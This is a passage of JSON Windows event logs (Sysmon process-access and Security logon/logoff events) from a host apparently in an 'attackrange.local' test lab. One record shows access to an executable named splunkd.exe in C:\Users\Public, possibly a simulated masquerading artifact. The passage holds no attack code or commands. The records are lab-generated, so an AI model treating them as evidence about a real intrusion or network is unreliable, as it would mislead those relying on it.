06:50:27.688","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10B3-5F25-0000-0010D9F30400}\r\nTargetProcessId: 4744\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10B3-5F25-0000-0010D9F30400}","TargetProcessId":"4744","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.829\r\nSourceProcessGUID: {E2A3D6B1-10B3-5F25-0000-0010D9F30400}\r\nSourceProcessId: 4744\r\nSourceThreadId: 4748\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.829","SourceProcessGUID":"{E2A3D6B1-10B3-5F25-0000-0010D9F30400}","SourceProcessId":"4744","SourceThreadId":"4748","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:28.252\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:28.252","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220382,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4F617\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4f617","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220383,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4F617\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52583\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4f617","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52583","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220384,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4F65E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4f65e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220385,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4F65E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52584\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4f65e","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52584","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220386,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4F65E\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4f65e","LogonType":"3","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220387,"ProcessID":864,"ThreadID":1260,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4F76D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4f76d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220388,"ProcessID":864,"ThreadID":1260,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x4F76D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52585\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x4f76d","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52585","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:50:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
